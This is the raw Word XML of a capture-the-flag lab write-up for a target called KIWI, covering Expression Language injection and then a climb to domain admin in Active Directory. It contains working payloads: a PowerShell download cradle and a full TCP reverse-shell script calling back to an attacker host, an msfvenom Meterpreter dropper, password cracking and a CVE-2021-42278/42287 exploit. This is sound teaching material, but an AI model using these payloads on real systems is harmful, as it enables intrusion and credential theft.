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KIWI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j9sgdw47rxib"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understand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c8u6zywlz3yt"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336800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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accessing port 8080, we find a form. We will fill it out and then intercept the request using Burp Suite.</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93900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Change request method →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vkt0at2gs68g" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expression Language Injection</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submitting, we can see in the response that it returns a message.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">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Expression Language (EL) injection occurs when attacker-controlled data enters an EL interpreter.</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EL implementations prior to version 2.2, an attacker can retrieve sensitive server-side information available through implicit objects. This includes model objects, beans, session scope, application scope, etc.</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EL 2.2 specification allows method invocation, which enables an attacker to execute arbitrary code within the application context. This can manipulate application functionality, expose sensitive data, and pivot into system-level code access — representing a serious risk of server compromise.</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I attempt to execute a ping command to my IP. We can use the following payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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T(java.lang.Runtime).getRuntime().exec('ping -n 4 &lt;IP&gt;')</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05000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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my tcpdump sniffer, I receive a ping from the machine (you will not be able to identify whether you receive a ping if you do not run a sniffer), which validates that we have code execution.</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81200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="83"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we have RCE, we can obtain a reverse shell.</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use a PowerShell reverse shell from Nishang:</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hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:spacing w:after="240" w:befor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Invoke-PowerShellTcp -Reverse -IPAddress &lt;IP-VPN&gt; -Port &lt;PORT&gt;</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Simply append the following command to the last line of the reverse shell:</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color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3263900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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ew6ks3wd37zl" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python Server to Host Our Reverse Shell:</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36800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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send our payload:</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\\T(java.lang.Runtime).getRuntime().exec('powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString(\"http://&lt;IP-VPN&gt;/reverse.ps1\")"')</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8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shell =)</w:t>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7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aq593hlioi98" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We Successfully Retrieved Our First Flag:</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35300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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navigating to the folder → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator/Documents</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">note.txt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59200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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d1mq06v7lxa5" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since We Are Inside a Container, We Need to Pivot to the AD Network</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But first, we need to dump rafael's password.</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do this, I will generate a reverse shell payload using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing us to obtain a Meterpreter session.</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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=&lt;IP-VPN&gt; LPORT=&lt;PORT&gt; -f exe &gt; shellz.exe</w:t>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43100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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upload our payload to the server. I will use Python to host the payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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41500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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powershell.exe -Command Invoke-WebRequest -Uri http://&lt;IP-VPN&gt;/shellz.exe -OutFile C:\Users\Public\Documents\shellz.exe</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46300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to receive the Meterpreter shell.</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73"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92300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="86"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44700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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Meterpreter shell, we can load the Kiwi module and perform a hashdump.</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78"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17s6sjsaq8vu" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>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crack the hash of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rafael.pereira</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, since we know his password may be reused in AD:</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hashcat -m 1000 hash $PATH-&gt;rockyou.txt</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78200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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now have the password. Next, we can pivot using the msfconsole module together with proxychains4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">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Network pivoting refers to the process of using a compromised machine, connected to multiple networks, to gain access to other networks. This approach is useful when the attacker wants to target machines in a different subnet.</w:t>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7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 autoroute -s 172.20.128.0/24</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background</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use auxiliary/server/socks_proxy</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set version 4a</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set srvport 9050</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run</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67"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here we have the AD server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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53"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an Active Directory domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for information gathering during the reconnaissance phase of an internal network pentest.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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ldapdomaindump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool designed to solve this problem by collecting and analyzing information available via LDAP and presenting it in a human-readable HTML format, as well as machine-readable json and csv/tsv/greppable files.</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proxychains4 ldapdomaindump -u 'KIWI\rafael.pereira' -p 'P@$$w0rd' -at SIMPLE ldap://172.20.128.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/dirkjanm/ldapdomaindump</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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00200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="87"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start a Python server and view the generated files through the browser.</w:t>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oj6xenshwieb" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>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1574800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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some information about our user and others. We can see that we are part of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Operators</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> group. Therefore, we can add ourselves to other groups — except high-privilege groups.</w:t>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I will add myself to the following group → </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Remote Management Users</w:t>
        </w:r>
      </w:hyperlink>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Members of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Management Users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> group can access WMI resources through management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.</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proxychains4 net rpc group addmem "Remote Management Users" rafael.pereira -S 172.20.128.1 -U rafael.pereira</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use the following command: Section 11.5. Remote Administration with net</w:t>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hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://flylib.com/books/en/2.335.1.86/1/</w:t>
        </w:r>
      </w:hyperlink>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0" l="0" r="0" t="0"/>
            <wp:docPr id="7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run the dump again to confirm that we were added to the group:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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65"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were successfully added to the group =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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76"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hyperlink r:id="rId39">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.infosecmatter.com/rce-on-windows-from-linux-part-2-crackmapexec/</w:t>
        </w:r>
      </w:hyperlink>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commands on the server using CrackMapExec via the WinRM interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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To test it, I will execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>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49400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="82"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OK, we can execute commands on the server.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Now we can send a PowerShell payload to obtain a reverse shell:</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 = New-Object System.Net.Sockets.TCPClient('&lt;IP-VPN&gt;',&lt;PORT&gt;);</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 = $c.GetStream();</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[byte[]]$b = 0..65535|%{0};</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while(($i = $s.Read($b, 0, $b.Length)) -ne 0){</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 = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);</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$sb = (iex $d 2&gt;&amp;1 | Out-String );</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$sb2 = $sb + 'PS ' + (pwd).Path + '&gt; ';</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$sbt = ([text.encoding]::ASCII).GetBytes($sb2);</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$s.Write($sbt,0,$sbt.Length);</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$s.Flush()};</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$c.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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receive the connection =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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11300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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s0528mm9bga7" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>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298700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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4umacvx2qf7e" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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I begin enumerating the system but cannot find anything that would allow privilege escalation.</w:t>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Researching AD privilege escalation, I find the following exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">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ffcjggmj94v" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-42278: sAMAccountName Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId43">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">The Microsoft advisory</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> describes CVE-2021-42278 as a security bypass vulnerability that allows adversaries to compromise a domain controller by exploiting sAMAccountName spoofing. Specifically, AD validation mechanisms do not verify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> character at the end of a computer account name, although all machine account names must end with it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">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s6w7boh4hn9b" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-42287: Active Directory Domain Controller Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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Microsoft describes CVE-2021-42287 as a security bypass vulnerability affecting the Kerberos Privilege Attribute Certificate (PAC). The flaw results from improper KDC configuration, allowing any computer account to impersonate AD domains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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chained together, the above security flaws allow attackers to gain domain administrator privileges in any Active Directory environment. The exploit chain is extremely easy to leverage, allowing adversaries to escalate privileges even without access to the underlying standard user account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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find the exploit at the following link:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId44">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/WazeHell/sam-the-admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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proxychains4 python3 sam_the_admin.py kiwi.uhclabs/rafael.pereira -dc-ip 172.20.128.1 -dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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the exploit, we can execute it:</w:t>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28900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75" name="image32.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image32.png"/>
